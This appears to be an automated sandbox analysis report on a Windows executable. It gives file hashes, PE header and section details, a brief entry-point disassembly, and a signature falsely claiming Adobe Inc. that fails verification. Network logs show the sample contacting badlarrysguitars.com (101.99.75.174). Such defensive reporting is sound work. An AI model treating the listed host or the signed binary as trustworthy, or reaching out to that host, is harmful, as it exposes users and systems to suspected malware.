                                                            SSDEEP:96:gOoCCg74fukvhkvCCtFObtWoHCObtWjHD:ho6726FObiObu
                                                            MD5:0A772CDE11D4A0BEFF134DC5827AFF94
                                                            SHA1:9FD4EF0BCDA8F2FBBF0A8DA069AEB8E4C4DBFA1D
                                                            SHA-256:AC7D6915851E03C143E9753194B44CE999637809707120E99E03553F1805CC8E
                                                            SHA-512:828D7ABAA5C768BFE0640FFAEFAE3ECC44880ED84825FD900A3547C351C4A901022BCE917DE158BB87F3AA4B016D20F06B233B7A44AA39C221F447B41844C44B
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ....N.5q....[...G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....2..G...G..G......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.v...........................c..A.p.p.D.a.t.a...B.V.1......Y.v..Roaming.@......EW)N.Y.v..........................V...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.v..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.v..........................2.{.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.v....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.v....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.v................
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6220
                                                            Entropy (8bit):3.7365847207756384
                                                            Encrypted:false
                                                            SSDEEP:96:gOoCCg74fukvhkvCCtFObtWoHCObtWjHD:ho6726FObiObu
                                                            MD5:0A772CDE11D4A0BEFF134DC5827AFF94
                                                            SHA1:9FD4EF0BCDA8F2FBBF0A8DA069AEB8E4C4DBFA1D
                                                            SHA-256:AC7D6915851E03C143E9753194B44CE999637809707120E99E03553F1805CC8E
                                                            SHA-512:828D7ABAA5C768BFE0640FFAEFAE3ECC44880ED84825FD900A3547C351C4A901022BCE917DE158BB87F3AA4B016D20F06B233B7A44AA39C221F447B41844C44B
                                                            Malicious:false
                                                            Preview:...................................FL..................F.".. ....N.5q....[...G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....2..G...G..G......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.v...........................c..A.p.p.D.a.t.a...B.V.1......Y.v..Roaming.@......EW)N.Y.v..........................V...R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.v..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)N.Y.v..........................2.{.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Y.v....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Y.v....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.v................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):55
                                                            Entropy (8bit):4.306461250274409
                                                            Encrypted:false
                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                            Malicious:false
                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.748470243900274
                                                            TrID:
                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                            • DOS Executable Generic (2002/1) 12.50%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                            File name:lg1wwLsmCX.exe
                                                            File size:64'456 bytes
                                                            MD5:1ceb5d0cb063290c1f66fccfed96a220
                                                            SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
                                                            SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
                                                            SHA512:4e17a9d98c1ea9db1f330d7475bed55a0c662ce5e546145eb8c1973fdf702571179a51ba39aa2c983f8ce42aa6edb1a72f1a20e9f7de78950f94076edc9527d0
                                                            SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                            TLSH:BD53F1B987441CE0C52E9B7421DA467E59B5B25672C1831372BFA4208FE8743BBBF780
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.....
                                                            Icon Hash:bdb5bd98b3f39807
                                                            Entrypoint:0x4011c0
                                                            Entrypoint Section:T10B924G
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                            DLL Characteristics:NO_SEH
                                                            Time Stamp:0x1F8A4465 [Wed Oct 8 11:32:53 1986 UTC] (predates both the PE format and the 2023 signing certificate below, so it is not a genuine link time)
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f41f41af65e0c95c3d701cfd7af8b14a
                                                            Signature Valid:false
                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash of the file does not match the digest inside the embedded signature)
                                                            Not Before, Not After
                                                            • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                            Subject Chain
                                                            • CN=Adobe Inc., OU=Acrobat 11, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                            Version:3
                                                            Thumbprint MD5:DE33CDD57B201C17BA1D948F9027EA38
                                                            Thumbprint SHA-1:8E5C0EF19E4319A5161B04C5179899335768CCC0
                                                            Thumbprint SHA-256:66048B4FFA7CEC38A851BD978E87BC469612964C9319C94005AC0FA060A6CE65
                                                            Serial:0E6E32FCB0E03A0C0B2BC04B56F2038B
                                                            Instruction
                                                            push ebp
                                                            dec eax
                                                            mov ebp, esp
                                                            dec eax
                                                            sub esp, 00000050h
                                                            mov eax, 00000000h
                                                            mov dword ptr [ebp-20h], eax
                                                            mov edx, 00030000h
                                                            mov ecx, 00010000h
                                                            call 00007F08B9061743h
                                                            mov ecx, 00000001h
                                                            call 00007F08B9061741h
                                                            dec eax
                                                            lea eax, dword ptr [ebp-20h]
                                                            dec eax
                                                            mov dword ptr [esp+20h], eax
                                                            mov eax, 00000000h
                                                            dec ecx
                                                            mov ecx, eax
                                                            dec eax
                                                            lea eax, dword ptr [ebp-18h]
                                                            dec ecx
                                                            mov eax, eax
                                                            dec eax
                                                            lea edx, dword ptr [ebp-10h]
                                                            dec eax
                                                            lea ecx, dword ptr [ebp-04h]
                                                            call 00007F08B9061724h
                                                            dec eax
                                                            mov eax, dword ptr [ebp-18h]
                                                            dec ecx
                                                            mov eax, eax
                                                            dec eax
                                                            mov edx, dword ptr [ebp-10h]
                                                            mov ecx, dword ptr [ebp-04h]
                                                            call 00007F08B90614A1h
                                                            mov dword ptr [ebp-1Ch], eax
                                                            mov ecx, dword ptr [ebp-1Ch]
                                                            call 00007F08B906170Eh
                                                            leave
                                                            ret
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx], al
                                                            add al, 02h
                                                            add eax, 50010304h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FD6h]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FFEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            jmp dword ptr [00000FBEh]
                                                            add byte ptr [eax], al
                                                            adc byte ptr [ebp+71h], bh
                                                            mov byte ptr [ecx], al
                                                            pushad
                                                            and dh, byte ptr [edi+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21e0 | 0x3c | G8MCUXOZ
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0xc094 | SRW4MTG9
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3000 | 0x18 | Z2TXZQUP
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd200 | 0x29c8 | SRW4MTG9
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x221c | 0x50 | G8MCUXOZ
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
T10B924G | 0x1000 | 0x2e9 | 0x400 | e60db9a21caf1bda7fd66724d6240776 | False | 0.392578125 | data | 3.828984910677204 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
G8MCUXOZ | 0x2000 | 0x360 | 0x400 | 9ba3852e83d41097503573521acac7b9 | False | 0.333984375 | data | 4.143245199340312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Z2TXZQUP | 0x3000 | 0x18 | 0x200 | 842ad4dd96cd5979a8d9cfca400a4eb1 | False | 0.0546875 | data | 0.2272518948570176 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
SRW4MTG9 | 0x4000 | 0xc094 | 0xc200 | 4d22c53c08a4da3f9079e168b3ca93ce | False | 0.9779719716494846 | data | 7.871980812241951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x40b8 | 0xbfc5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9867598231927158
RT_GROUP_ICON | 0x10080 | 0x14 | data | | | 1.1
DLL | Import
msvcrt.dll | memset, _controlfp, __set_app_type, __getmainargs, exit
kernel32.dll | CreateProcessA, WaitForSingleObject, CloseHandle
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 15:53:00.633753061 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:00.633795977 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:00.634047031 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:00.647792101 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:00.647813082 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.057342052 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.057425976 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.061132908 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.061144114 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.061561108 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.100188017 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.143337965 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.604001999 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.604036093 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.604039907 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.604141951 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.604165077 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.657387972 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.690201998 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.690216064 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.690242052 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.690294981 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.690332890 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.812171936 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.812189102 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.812266111 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.812294006 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.838423967 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.838474035 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.838505030 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.838515043 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.838541985 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.855806112 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.855885983 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.855906963 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.888819933 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.888835907 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.888900995 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.888923883 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.938636065 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.984513998 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.984554052 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.984572887 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:02.984597921 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:02.984632015 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.004287004 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.004297972 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.004333973 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.004359007 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.004406929 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.021553993 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.021562099 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.021641970 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.031825066 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.031836033 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.031894922 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.046988010 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.046997070 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.047056913 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.047075033 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.059432983 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.059478998 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.059528112 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.059528112 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.059540987 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.068571091 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.068610907 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.068643093 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.068653107 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.068685055 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.077713966 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.077780962 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.077795982 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.110018015 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.110124111 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.110138893 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.157385111 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.203720093 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.203733921 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.203762054 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.203804016 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.203840971 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.213692904 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.213701963 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.213728905 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.213754892 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.213785887 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.213794947 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.213810921 CET | 443 | 49709 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:03.213876963 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:03.236361027 CET | 49709 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:13.482881069 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:13.482906103 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:13.483125925 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:13.483344078 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:13.483355999 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.907342911 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.907812119 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:14.907830000 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.908934116 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.908993959 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:14.909003019 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.909040928 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:14.910340071 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:14.910408020 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.911037922 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:14.911055088 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:14.975581884 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:15.357577085 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:15.357683897 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:15.358385086 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:15.359283924 CET | 49748 | 443 | 192.168.2.10 | 54.224.241.105
Dec 6, 2024 15:53:15.359302998 CET | 443 | 49748 | 54.224.241.105 | 192.168.2.10
Dec 6, 2024 15:53:37.253015041 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:37.253046036 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:37.253166914 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:37.261131048 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:37.261142015 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:38.845205069 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:38.845325947 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:38.849477053 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:38.849498034 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:38.849791050 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:38.856580973 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:38.903331995 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:39.388607025 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:39.388689995 CET | 443 | 49806 | 101.99.75.174 | 192.168.2.10
Dec 6, 2024 15:53:39.388736963 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Dec 6, 2024 15:53:39.398739100 CET | 49806 | 443 | 192.168.2.10 | 101.99.75.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 15:53:00.482866049 CET | 50739 | 53 | 192.168.2.10 | 1.1.1.1
Dec 6, 2024 15:53:00.620666027 CET | 53 | 50739 | 1.1.1.1 | 192.168.2.10
Dec 6, 2024 15:53:14.295722961 CET | 49989 | 53 | 192.168.2.10 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 15:53:00.482866049 CET | 192.168.2.10 | 1.1.1.1 | 0x54ea | Standard query (0) | badlarrysguitars.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:53:14.295722961 CET | 192.168.2.10 | 1.1.1.1 | 0xfafa | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 15:53:00.620666027 CET | 1.1.1.1 | 192.168.2.10 | 0x54ea | No error (0) | badlarrysguitars.com | | 101.99.75.174 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:53:14.437144041 CET | 1.1.1.1 | 192.168.2.10 | 0xfafa | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 15:53:14.979360104 CET | 1.1.1.1 | 192.168.2.10 | 0x68d3 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:53:14.979360104 CET | 1.1.1.1 | 192.168.2.10 | 0x68d3 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:53:28.426223993 CET | 1.1.1.1 | 192.168.2.10 | 0x544a | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:53:28.426223993 CET | 1.1.1.1 | 192.168.2.10 | 0x544a | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:16.680840015 CET | 1.1.1.1 | 192.168.2.10 | 0x2a6b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:16.680840015 CET | 1.1.1.1 | 192.168.2.10 | 0x2a6b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:17.952187061 CET | 1.1.1.1 | 192.168.2.10 | 0xb258 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:17.952187061 CET | 1.1.1.1 | 192.168.2.10 | 0xb258 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:40.737366915 CET | 1.1.1.1 | 192.168.2.10 | 0x80f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:54:40.737366915 CET | 1.1.1.1 | 192.168.2.10 | 0x80f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:55:04.917664051 CET | 1.1.1.1 | 192.168.2.10 | 0x3a8a | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:55:04.917664051 CET | 1.1.1.1 | 192.168.2.10 | 0x3a8a | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                                            • badlarrysguitars.com
                                                            • https:
                                                              • p13n.adobe.io
